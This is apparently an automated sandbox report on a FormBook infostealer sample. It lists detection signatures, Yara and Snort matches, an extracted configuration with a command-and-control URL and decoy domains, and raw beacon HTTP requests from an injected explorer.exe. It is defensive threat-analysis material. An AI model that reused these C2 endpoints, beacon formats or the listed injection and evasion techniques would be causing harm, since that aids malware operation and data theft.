Windows Analysis Report
GV8EJooYMIgEnEk.exe

Overview

General Information

Sample Name: GV8EJooYMIgEnEk.exe
Analysis ID: 562399
MD5: cf6d4fd3dc8e4751b7f89f857b618ef3
SHA1: 15b95f0f1b5785bb7fd3d97757f3eea49d1f6951
SHA256: 9689e8e0cf51b8b5c98ddb007636d8acf7e03c9cc8a7bf99aafdaaebae2dfb3a
Tags: exe
Infos:

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Machine Learning detection for sample
Self deletion via cmd delete
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
Contains functionality to read the PEB
Checks if the current process is being debugged
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

AV Detection
barindex
Found malware configuration
Source: 00000000.00000002.346719302.00000000038B9000.00000004.00000800.00020000.00000000.sdmp Malware Configuration Extractor: FormBook {"C2 list": ["www.cottoneworld.com/cbgo/"], "decoy": ["tablescaperendezvous4two.net", "abktransportllc.net", "roseevision.com", "skategrindingwheels.com", "robux-generator-free.xyz", "yacusi.com", "mgav35.xyz", "paravocecommerce.com", "venkatramanrm.com", "freakyhamster.com", "jenaashoponline.com", "dmozlisting.com", "lorrainekclark.store", "handyman-prime.com", "thecrashingbrains.com", "ukpms.com", "livingstonemines.com", "papeisonline.com", "chrisbakerpr.com", "omnipets.store", "anatox-lab.fr", "missingthered.com", "himalaya-nepalorganic.com", "bitcoin-bot.xyz", "velarusbet78.com", "redesignyourpain.com", "alonetogetherentertainment.com", "sandywalling.com", "solacegolf.com", "charlottesbestroofcompany.com", "stefanybeauty.com", "webarate.com", "experiencedlawfirms.com", "lyfygthj.com", "monoicstudios.com", "rgamming.com", "mintique.pro", "totalwinerewards.com", "praelatusproducts.com", "daniloff.pro", "qmir.digital", "tatasteell.com", "casatowerofficial.com", "sunrisespaandbodywork.com", "mgav66.xyz", "bastnbt.com", "fabiulaezeca.com", "sunmountainautomotive.com", "madgeniustalk.com", "elite-hc.com", "billcurdmusic.net", "foxclothings.com", "adtcmrac.com", "buresdx.com", "tothelaundry.com", "bitconga.com", "onlinebiyoloji.online", "up-trend.store", "kaarlehto.com", "interview.online", "grantgroupproperties.com", "jpmhomes.net", "yinlimine.xyz", "roadtrippings.com"]}
Multi AV Scanner detection for submitted file
Source: GV8EJooYMIgEnEk.exe Virustotal: Detection: 60% Perma Link
Source: GV8EJooYMIgEnEk.exe Metadefender: Detection: 20% Perma Link
Source: GV8EJooYMIgEnEk.exe ReversingLabs: Detection: 62%
Yara detected FormBook
Source: Yara match File source: 3.0.GV8EJooYMIgEnEk.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.GV8EJooYMIgEnEk.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.GV8EJooYMIgEnEk.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.0.GV8EJooYMIgEnEk.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.0.GV8EJooYMIgEnEk.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.0.GV8EJooYMIgEnEk.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.0.GV8EJooYMIgEnEk.exe.400000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.GV8EJooYMIgEnEk.exe.3a0a690.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.GV8EJooYMIgEnEk.exe.3a64cb0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000A.00000002.566987802.0000000004A90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.566934966.0000000004790000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.346719302.00000000038B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000000.343584977.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.415734723.00000000016B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.566609837.0000000000140000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.414374304.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.415434999.0000000001660000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.389518706.0000000007CDD000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.372050188.0000000007CDD000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000000.343960936.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Antivirus detection for URL or domain
Source: www.cottoneworld.com/cbgo/ Avira URL Cloud: Label: malware
Source: http://www.casatowerofficial.com/cbgo/?Xf3=7nL8&4hPx=EmDZCHQOcI1nLFjwZeeYVuMSiom2MDKGDS/zESQUEEY6NQpaRm0dZ/ZfJs3HzPw+5Ylf Avira URL Cloud: Label: malware
Machine Learning detection for sample
Source: GV8EJooYMIgEnEk.exe Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 3.0.GV8EJooYMIgEnEk.exe.400000.4.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 3.0.GV8EJooYMIgEnEk.exe.400000.8.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 3.2.GV8EJooYMIgEnEk.exe.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 3.0.GV8EJooYMIgEnEk.exe.400000.6.unpack Avira: Label: TR/Crypt.ZPACK.Gen

Compliance
barindex
Uses 32bit PE files
Source: GV8EJooYMIgEnEk.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
Source: GV8EJooYMIgEnEk.exe Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: chkdsk.pdbGCTL source: GV8EJooYMIgEnEk.exe, 00000003.00000002.415690585.0000000001690000.00000040.10000000.00040000.00000000.sdmp
Source: Binary string: chkdsk.pdb source: GV8EJooYMIgEnEk.exe, 00000003.00000002.415690585.0000000001690000.00000040.10000000.00040000.00000000.sdmp
Source: Binary string: wntdll.pdbUGP source: GV8EJooYMIgEnEk.exe, 00000003.00000002.415809187.0000000001720000.00000040.00000800.00020000.00000000.sdmp, GV8EJooYMIgEnEk.exe, 00000003.00000002.415965180.000000000183F000.00000040.00000800.00020000.00000000.sdmp, chkdsk.exe, 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, chkdsk.exe, 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: GV8EJooYMIgEnEk.exe, 00000003.00000002.415809187.0000000001720000.00000040.00000800.00020000.00000000.sdmp, GV8EJooYMIgEnEk.exe, 00000003.00000002.415965180.000000000183F000.00000040.00000800.00020000.00000000.sdmp, chkdsk.exe, chkdsk.exe, 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, chkdsk.exe, 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmp
Source: Binary string: StructuralEqualityCompar.pdb source: GV8EJooYMIgEnEk.exe

Software Vulnerabilities
barindex
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Code function: 4x nop then pop edi 3_2_00415681
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 4x nop then pop edi 10_2_04AA5681

Networking
barindex
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49817 -> 199.59.243.200:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49817 -> 199.59.243.200:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49817 -> 199.59.243.200:80
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49820 -> 18.231.72.25:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49820 -> 18.231.72.25:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49820 -> 18.231.72.25:80
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49821 -> 34.102.136.180:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49821 -> 34.102.136.180:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49821 -> 34.102.136.180:80
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Network Connect: 166.88.62.202 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.casatowerofficial.com
Source: C:\Windows\explorer.exe Domain query: www.bitconga.com
Source: C:\Windows\explorer.exe Domain query: www.totalwinerewards.com
Source: C:\Windows\explorer.exe Network Connect: 199.59.243.200 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.tothelaundry.com
Source: C:\Windows\explorer.exe Domain query: www.omnipets.store
Source: C:\Windows\explorer.exe Network Connect: 46.252.151.235 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 18.231.72.25 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.webarate.com
Source: C:\Windows\explorer.exe Network Connect: 34.102.136.180 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.experiencedlawfirms.com
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: www.cottoneworld.com/cbgo/
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: ASSUPERNOVAIT ASSUPERNOVAIT
Source: Joe Sandbox View ASN Name: EGIHOSTINGUS EGIHOSTINGUS
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /cbgo/?Xf3=7nL8&4hPx=7Chnk+6aZrnZKD5hPI2GMOI+n7dvSwdfhhGQh0Quh+scZbPipDWGAiRMNWcFVsP/HL+E HTTP/1.1Host: www.experiencedlawfirms.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /cbgo/?4hPx=1bX869aeBvRpB8efE68exBqREj8ZtAjUgPjKFGRzRfZzNr9ae7mwrEXk0/ZD8RpqTQtr&Xf3=7nL8 HTTP/1.1Host: www.totalwinerewards.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /cbgo/?Xf3=7nL8&4hPx=EmDZCHQOcI1nLFjwZeeYVuMSiom2MDKGDS/zESQUEEY6NQpaRm0dZ/ZfJs3HzPw+5Ylf HTTP/1.1Host: www.casatowerofficial.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /cbgo/?4hPx=dYuxO3siHqLtebwjMrcX5kx68cWjYzK43o/BCbb09yTbLvpXET1fm3yQPY7Ys1RTSltw&Xf3=7nL8 HTTP/1.1Host: www.bitconga.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /cbgo/?4hPx=t6byCRjNUQvGMW438Oj8n0b0Tq5DbL5JR7oEbxqA77YwnlkkuyfhzykLt/IStXAvHe2n&Xf3=7nL8 HTTP/1.1Host: www.omnipets.storeConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 199.59.243.200 199.59.243.200
Source: global traffic HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Fri, 28 Jan 2022 19:59:53 GMTContent-Type: text/htmlContent-Length: 275ETag: "61f22041-113"Via: 1.1 googleConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Fri, 28 Jan 2022 20:00:09 GMTContent-Type: text/htmlContent-Length: 275ETag: "61f22041-113"Via: 1.1 googleConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
Source: GV8EJooYMIgEnEk.exe, 00000000.00000002.348586160.0000000006982000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://fontfabrik.com
Source: explorer.exe, 00000005.00000000.375783140.00000000089CC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.356516415.00000000089CC000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://schemas.mi
Source: explorer.exe, 00000005.00000000.375783140.00000000089CC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.356516415.00000000089CC000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://schemas.micr
Source: GV8EJooYMIgEnEk.exe, 00000000.00000002.348586160.0000000006982000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: GV8EJooYMIgEnEk.exe, 00000000.00000002.348586160.0000000006982000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.carterandcone.coml
Source: GV8EJooYMIgEnEk.exe, 00000000.00000002.348586160.0000000006982000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com
Source: GV8EJooYMIgEnEk.exe, 00000000.00000002.348586160.0000000006982000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers
Source: GV8EJooYMIgEnEk.exe, 00000000.00000002.348586160.0000000006982000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers/?
Source: GV8EJooYMIgEnEk.exe, 00000000.00000002.348586160.0000000006982000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: GV8EJooYMIgEnEk.exe, 00000000.00000002.348586160.0000000006982000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: GV8EJooYMIgEnEk.exe, 00000000.00000002.348586160.0000000006982000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers8
Source: GV8EJooYMIgEnEk.exe, 00000000.00000002.348586160.0000000006982000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers?
Source: GV8EJooYMIgEnEk.exe, 00000000.00000002.348586160.0000000006982000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designersG
Source: GV8EJooYMIgEnEk.exe, 00000000.00000002.348586160.0000000006982000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fonts.com
Source: GV8EJooYMIgEnEk.exe, 00000000.00000002.348586160.0000000006982000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.founder.com.cn/cn
Source: GV8EJooYMIgEnEk.exe, 00000000.00000002.348586160.0000000006982000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: GV8EJooYMIgEnEk.exe, 00000000.00000002.348586160.0000000006982000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: GV8EJooYMIgEnEk.exe, 00000000.00000002.348586160.0000000006982000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: GV8EJooYMIgEnEk.exe, 00000000.00000002.348586160.0000000006982000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: GV8EJooYMIgEnEk.exe, 00000000.00000002.348586160.0000000006982000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.goodfont.co.kr
Source: GV8EJooYMIgEnEk.exe, 00000000.00000002.348586160.0000000006982000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: GV8EJooYMIgEnEk.exe, 00000000.00000002.348586160.0000000006982000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.sajatypeworks.com
Source: GV8EJooYMIgEnEk.exe, 00000000.00000002.348586160.0000000006982000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.sakkal.com
Source: GV8EJooYMIgEnEk.exe, 00000000.00000002.348586160.0000000006982000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.sandoll.co.kr
Source: GV8EJooYMIgEnEk.exe, 00000000.00000002.348586160.0000000006982000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.tiro.com
Source: GV8EJooYMIgEnEk.exe, 00000000.00000002.348586160.0000000006982000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.typography.netD
Source: GV8EJooYMIgEnEk.exe, 00000000.00000002.348586160.0000000006982000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.urwpp.deDPlease
Source: GV8EJooYMIgEnEk.exe, 00000000.00000002.348586160.0000000006982000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.zhongyicts.com.cn
Source: chkdsk.exe, 0000000A.00000002.567570412.0000000005412000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: https://fonts.googleapis.com
Source: chkdsk.exe, 0000000A.00000002.567570412.0000000005412000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: https://parking.bodiscdn.com
Source: chkdsk.exe, 0000000A.00000002.567570412.0000000005412000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: https://www.google.com
Source: unknown DNS traffic detected: queries for: www.experiencedlawfirms.com
Source: global traffic HTTP traffic detected: GET /cbgo/?Xf3=7nL8&4hPx=7Chnk+6aZrnZKD5hPI2GMOI+n7dvSwdfhhGQh0Quh+scZbPipDWGAiRMNWcFVsP/HL+E HTTP/1.1Host: www.experiencedlawfirms.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /cbgo/?4hPx=1bX869aeBvRpB8efE68exBqREj8ZtAjUgPjKFGRzRfZzNr9ae7mwrEXk0/ZD8RpqTQtr&Xf3=7nL8 HTTP/1.1Host: www.totalwinerewards.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /cbgo/?Xf3=7nL8&4hPx=EmDZCHQOcI1nLFjwZeeYVuMSiom2MDKGDS/zESQUEEY6NQpaRm0dZ/ZfJs3HzPw+5Ylf HTTP/1.1Host: www.casatowerofficial.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /cbgo/?4hPx=dYuxO3siHqLtebwjMrcX5kx68cWjYzK43o/BCbb09yTbLvpXET1fm3yQPY7Ys1RTSltw&Xf3=7nL8 HTTP/1.1Host: www.bitconga.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /cbgo/?4hPx=t6byCRjNUQvGMW438Oj8n0b0Tq5DbL5JR7oEbxqA77YwnlkkuyfhzykLt/IStXAvHe2n&Xf3=7nL8 HTTP/1.1Host: www.omnipets.storeConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

E-Banking Fraud
barindex
Yara detected FormBook
Source: Yara match File source: 3.0.GV8EJooYMIgEnEk.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.GV8EJooYMIgEnEk.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.GV8EJooYMIgEnEk.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.0.GV8EJooYMIgEnEk.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.0.GV8EJooYMIgEnEk.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.0.GV8EJooYMIgEnEk.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.0.GV8EJooYMIgEnEk.exe.400000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.GV8EJooYMIgEnEk.exe.3a0a690.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.GV8EJooYMIgEnEk.exe.3a64cb0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000A.00000002.566987802.0000000004A90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.566934966.0000000004790000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.346719302.00000000038B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000000.343584977.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.415734723.00000000016B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.566609837.0000000000140000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.414374304.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.415434999.0000000001660000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.389518706.0000000007CDD000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.372050188.0000000007CDD000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000000.343960936.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: 3.0.GV8EJooYMIgEnEk.exe.400000.8.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 3.0.GV8EJooYMIgEnEk.exe.400000.8.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 3.2.GV8EJooYMIgEnEk.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 3.2.GV8EJooYMIgEnEk.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 3.2.GV8EJooYMIgEnEk.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 3.2.GV8EJooYMIgEnEk.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.GV8EJooYMIgEnEk.exe.28fd388.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables potentially checking for WinJail sandbox window Author: ditekSHen
Source: 3.0.GV8EJooYMIgEnEk.exe.400000.6.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 3.0.GV8EJooYMIgEnEk.exe.400000.6.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 3.0.GV8EJooYMIgEnEk.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 3.0.GV8EJooYMIgEnEk.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 3.0.GV8EJooYMIgEnEk.exe.400000.6.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 3.0.GV8EJooYMIgEnEk.exe.400000.6.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 3.0.GV8EJooYMIgEnEk.exe.400000.8.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 3.0.GV8EJooYMIgEnEk.exe.400000.8.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.GV8EJooYMIgEnEk.exe.2979c1c.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables potentially checking for WinJail sandbox window Author: ditekSHen
Source: 0.2.GV8EJooYMIgEnEk.exe.3a0a690.3.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.2.GV8EJooYMIgEnEk.exe.3a0a690.3.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.GV8EJooYMIgEnEk.exe.3a64cb0.4.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.2.GV8EJooYMIgEnEk.exe.3a64cb0.4.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
